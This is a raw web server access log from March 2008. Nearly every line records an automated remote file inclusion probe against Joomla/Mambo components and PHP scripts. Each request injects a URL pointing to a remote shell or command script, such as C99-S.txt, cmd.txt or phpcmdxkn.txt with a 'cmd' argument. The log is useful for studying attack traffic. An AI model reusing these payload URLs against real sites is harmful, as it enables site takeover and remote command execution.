69.93.43.34 - - [16/Mar/2008:17:36:07 -0700] "GET /logs/access_070723.log/index.php?go=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:17:36:45 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:17:36:48 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
80.190.134.206 - - [16/Mar/2008:17:36:52 -0700] "GET /logs/index3.php?id=http://www.discapacidadesecuador.org/cache/.ownz/lfi.gif????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
85.14.221.150 - - [16/Mar/2008:17:37:23 -0700] "GET /logs//?mosConfig_absolute_path=http://safe-bx.iespana.es/test.txt???? HTTP/1.1" 200 6663 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
80.190.134.206 - - [16/Mar/2008:17:37:31 -0700] "GET /index3.php?id=http://www.discapacidadesecuador.org/cache/.ownz/lfi.gif????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:17:37:35 -0700] "GET /index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
124.217.247.166 - - [16/Mar/2008:17:37:54 -0700] "GET /logs/access_080114.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:17:38:26 -0700] "GET /index.php?configFile=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:17:38:27 -0700] "GET /logs/index.php?configFile=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:38:28 -0700] "GET /logs/admin.php?cal_dir=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:38:29 -0700] "GET /admin.php?cal_dir=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:38:32 -0700] "GET /logs/index2.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:38:33 -0700] "GET /index2.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
193.77.135.56 - - [16/Mar/2008:17:39:18 -0700] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:17:39:42 -0700] "GET /_functions.php?prefix=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:17:39:42 -0700] "GET /logs/_functions.php?prefix=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:40:15 -0700] "GET /logs/access.log/dmin.php?include_path=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:40:15 -0700] "GET /logs/dmin.php?include_path=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:40:37 -0700] "GET //oneadmin/config.php?path[docroot]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:40:38 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:40:58 -0700] "GET /logs/admin.php?cal_dir=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:40:59 -0700] "GET /admin.php?cal_dir=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:43:03 -0700] "GET /logs/access_070924.log//oneadmin/config.php?path[docroot]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.35.225.138 - - [16/Mar/2008:17:43:05 -0700] "GET /logs/index.php?option=com_expose&Itemid=&mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.35.225.138 - - [16/Mar/2008:17:43:06 -0700] "GET /index.php?option=com_expose&Itemid=&mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:46:09 -0700] "GET /logs/access.log/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:46:09 -0700] "GET /index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:17:46:13 -0700] "GET /index.php?do=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:17:46:13 -0700] "GET /logs/index.php?do=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:46:15 -0700] "GET /logs/access.log/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:46:15 -0700] "GET /index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:46:46 -0700] "GET /logs/access_071203.log/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:46:59 -0700] "GET /logs/access_071203.log/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.52.2.130 - - [16/Mar/2008:17:47:12 -0700] "GET /logs/access_070820.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:47:32 -0700] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:47:46 -0700] "GET /logs/access_071015.log/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:47:47 -0700] "GET /logs/access_071015.log/index.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:47:47 -0700] "GET /logs/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:47:47 -0700] "GET /logs/index.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:48:00 -0700] "GET /logs/access_070820.log/_functions.php?prefix=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:48:01 -0700] "GET /_functions.php?prefix=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:48:02 -0700] "GET /logs/_functions.php?prefix=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:48:08 -0700] "GET /logs/access_071224.log/index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:48:20 -0700] "GET /logs/access_071224.log/index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:17:48:29 -0700] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:17:48:29 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:48:46 -0700] "GET /logs/access_070723.log/index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:49:04 -0700] "GET /logs/access_070723.log/index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
91.184.52.12 - - [16/Mar/2008:17:49:07 -0700] "GET /logs//index.php4?lang=http://212.128.140.23:8080/rcans/////id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.184.52.12 - - [16/Mar/2008:17:49:07 -0700] "GET /logs//index.php4?lang=http://212.128.140.23:8080/rcans/////allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.184.52.12 - - [16/Mar/2008:17:49:07 -0700] "GET //index.php4?lang=http://212.128.140.23:8080/rcans/////id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.184.52.12 - - [16/Mar/2008:17:49:07 -0700] "GET //index.php4?lang=http://212.128.140.23:8080/rcans/////allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.184.52.12 - - [16/Mar/2008:17:49:08 -0700] "GET /logs//index.php4?lang=http://212.128.140.23:8080/rcans/////id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.184.52.12 - - [16/Mar/2008:17:49:08 -0700] "GET //index.php4?lang=http://212.128.140.23:8080/rcans/////id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.215.105 - - [16/Mar/2008:17:49:09 -0700] "GET /logs//index.php4?lang=http://212.128.140.23:8080/rcans/////allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.184.52.12 - - [16/Mar/2008:17:49:09 -0700] "GET /logs//index.php4?lang=http://212.128.140.23:8080/rcans/////id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.184.52.12 - - [16/Mar/2008:17:49:09 -0700] "GET //index.php4?lang=http://212.128.140.23:8080/rcans/////id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.91.249.193 - - [16/Mar/2008:17:49:17 -0700] "GET /logs//index.php4?lang=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.91.249.193 - - [16/Mar/2008:17:49:17 -0700] "GET //index.php4?lang=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.91.249.193 - - [16/Mar/2008:17:49:18 -0700] "GET /logs//index.php4?lang=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.91.249.193 - - [16/Mar/2008:17:49:18 -0700] "GET //index.php4?lang=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:49:20 -0700] "GET /logs/access_071015.log/index.php?configFile=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:49:20 -0700] "GET /index.php?configFile=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:49:21 -0700] "GET /logs/index.php?configFile=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
212.25.95.194 - - [16/Mar/2008:17:49:30 -0700] "GET /index.php?c=http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
212.25.95.194 - - [16/Mar/2008:17:49:30 -0700] "GET /logs/index.php?c=http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:49:56 -0700] "GET //index.php4?lang=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:17:50:40 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:50:40 -0700] "GET //index.php4?lang=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:50:44 -0700] "GET /logs//index.php4?lang=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:50:44 -0700] "GET /logs/access_071105.log/components/com_performs/performs.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:50:44 -0700] "GET //index.php4?lang=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:50:45 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:50:45 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:50:56 -0700] "GET /logs/index2.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:50:59 -0700] "GET /index2.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:51:07 -0700] "GET /logs/access_071217.log/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:51:11 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:52:01 -0700] "GET /logs/access_071015.log/*index.php?arquivo=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:52:01 -0700] "GET /*index.php?arquivo=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:52:09 -0700] "GET /logs/access_071015.log/*index.php?arquivo=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:52:09 -0700] "GET /*index.php?arquivo=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.203.209.2 - - [16/Mar/2008:17:52:26 -0700] "GET /index3.php?pag=http://www.cedecapaulofreire.org.br/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:52:52 -0700] "GET /logs/access_071231.log/*index.php?arquivo=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:52:53 -0700] "GET /logs/access_070820.log/_functions.php?prefix=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:52:53 -0700] "GET /_functions.php?prefix=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:52:54 -0700] "GET /logs/_functions.php?prefix=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:53:14 -0700] "GET /logs/access_071231.log/*index.php?arquivo=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:53:32 -0700] "GET /logs//index.php4?lang=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:53:32 -0700] "GET //index.php4?lang=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
72.36.235.74 - - [16/Mar/2008:17:53:59 -0700] "GET /logs/access_070820.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.30.226.137 - - [16/Mar/2008:17:54:41 -0700] "GET /logs/access_071022.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:55:03 -0700] "GET /logs//index.php4?lang=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:55:03 -0700] "GET //index.php4?lang=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:56:18 -0700] "GET /logs/access_070924.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:56:18 -0700] "GET /logs/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:56:46 -0700] "GET /logs/access_071231.log//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:56:46 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:56:47 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:56:47 -0700] "GET /logs/access_071231.log//components/com_simpleboard/image_upload.php?sbp=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:56:48 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:56:48 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:57:00 -0700] "GET /logs/access_071015.log/index.php?configFile=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:57:00 -0700] "GET /index.php?configFile=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:17:57:00 -0700] "GET /logs/index.php?configFile=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.70.14.90 - - [16/Mar/2008:17:57:10 -0700] "GET /logs/index2.php?x=http://www.xplproxysx.kit.net/phpcmdxkn.txt?&cmd=cd%20id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.70.14.90 - - [16/Mar/2008:17:57:10 -0700] "GET /index2.php?x=http://www.xplproxysx.kit.net/phpcmdxkn.txt?&cmd=cd%20id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:57:26 -0700] "GET /logs/access_070820.log/index2.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:57:27 -0700] "GET /index2.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:57:28 -0700] "GET /logs/index2.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
212.227.48.50 - - [16/Mar/2008:17:57:28 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:57:36 -0700] "GET /logs/access_070730.log/index2.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:58:11 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.70.14.90 - - [16/Mar/2008:17:58:15 -0700] "GET //index.php4?lang=http://www.xplproxysx.kit.net/phpcmdxkn.txt?&cmd=cd%20id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:58:17 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.77.135.56 - - [16/Mar/2008:17:59:32 -0700] "GET /logs/access_071231.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.77.135.56 - - [16/Mar/2008:17:59:43 -0700] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.77.135.56 - - [16/Mar/2008:17:59:43 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.70.14.90 - - [16/Mar/2008:17:59:59 -0700] "GET /logs/admin.php?cal_dir=http://www.xplproxysx.kit.net/phpcmdxkn.txt?&cmd=cd%20id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.70.14.90 - - [16/Mar/2008:17:59:59 -0700] "GET /admin.php?cal_dir=http://www.xplproxysx.kit.net/phpcmdxkn.txt?&cmd=cd%20id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:18:00:04 -0700] "GET /logs/access_071015.log/index.php?configFile=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:18:00:05 -0700] "GET /index.php?configFile=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
81.2.252.37 - - [16/Mar/2008:18:00:09 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.2.252.37 - - [16/Mar/2008:18:00:10 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.2.252.37 - - [16/Mar/2008:18:00:11 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
